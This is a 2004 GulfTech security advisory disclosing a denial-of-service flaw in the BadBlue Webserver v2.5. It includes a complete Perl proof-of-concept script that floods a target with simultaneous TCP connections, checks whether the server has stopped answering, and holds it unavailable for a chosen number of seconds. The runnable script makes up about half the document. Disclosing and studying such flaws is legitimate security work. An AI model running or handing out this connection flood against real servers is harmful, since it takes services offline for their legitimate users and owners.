00042-08202004.txt

`##########################################################  
# GulfTech Security Research August, 18th 2004  
##########################################################  
# Vendor : BadBlue  
# URL : http://www.badblue.com  
# Version : BadBlue Webserver v2.5  
# Risk : Denial of Service  
##########################################################  
  
Description:  
Share photos, videos, music, and business files with friends   
and colleagues instantly. Tired of paying a service to share   
your files (and the hassle of sending your files to their   
site) BadBlue shares files directly from your own PC, using   
the cable /DSL/broadband/dialup connection you already paid   
for! BadBlue lets you run a no-hassle Web site on your own   
PC for free, including a domain name you can choose. Within   
seconds, you can transform your PC into a friendly, file   
sharing Web server with all the power of a real server on the   
Internet. Remote users can search for files, explore your   
shared folders, and run full-blown applications created in   
HTML, PHP, Perl, and so on.  
  
  
  
Denial of Service:  
BadBlue Webserver cannot handle multiple connections from the   
same host, and will deny all acess to any users at right around   
twenty four simultaneous connections.I have included a proof of   
concept that floods the target server with a number of connections,   
and then basically keeps those connections up for as long as you   
specify, thus blocking all other traffic to the affected server.   
  
  
  
#!/usr/bin/perl  
##############################################################  
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code  
##############################################################  
# BadBlue Web Server can not handle many simultaneous connects  
# from the same host, and will lock up until the connects stop  
##############################################################  
# This Proof Of Concept Written By GulfTech Security Research  
##############################################################  
  
use Strict;   
use Socket;  
use IO::Socket;  
  
my $host = $ARGV[0];  
my $port = $ARGV[1];  
my $stop = $ARGV[2];  
my $size = 1000;  
my $prot = getprotobyname('tcp');  
my $slep = $ARGV[3];  
  
printf("================================================\n");  
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");  
printf("================================================\n");  
printf("[*] Making %d Connections To %s \n", $stop , $host);  
  
for ($i=1; $i<$stop; $i++)  
{  
socket($i, PF_INET, SOCK_STREAM, $prot );   
my $dest = sockaddr_in ($port, inet_aton($host));  
connect($i, $dest);  
}  
  
CheckServer($host, $i, $slep, $stop);  
KillThreads($stop);  
printf("[*] Exploit Attempt Unsuccesful");  
exit;  
  
sub CheckServer($host, $i, $slep, $stop) {  
($host, $i, $slep, $stop) = @_;  
$blank = "\015\012" x 2;  
$request = "GET / HTTP/1.0".$blank;  
$remote = IO::Socket::INET->new( Proto => "tcp",  
PeerAddr => $host,  
PeerPort => $port,  
Timeout => '10000',  
Type => SOCK_STREAM,  
);   
print $remote $request;  
unless ( <$remote> )  
{  
printf("[*] Host %s Has Been Successfully DoS'ed\n", $host);  
printf("[*] The Host Will Be Down For %d Seconds\n", $slep);  
sleep($slep);  
KillThreads($stop);  
exit;  
}  
}  
  
sub KillThreads($stop) {  
$stop = @_;  
printf("[*] Killing All active Connections");  
for ($l=1; $l<$stop; $l++) {  
shutdown($l,2)|| die("Couldn't Shut Down Socket");  
$l++;  
}  
}  
  
  
Solution:  
The development team has been contacted and said they will be   
looking into this issue shortly. Users are advised to upgrade   
as soon as possible.   
  
  
  
Related Info:  
The original advisory can be found at the following location   
http://www.gulftech.org/?node=research&article_id=00042-08202004  
  
  
  
Credits:  
James Bercegay of the GulfTech Security Research Team  
`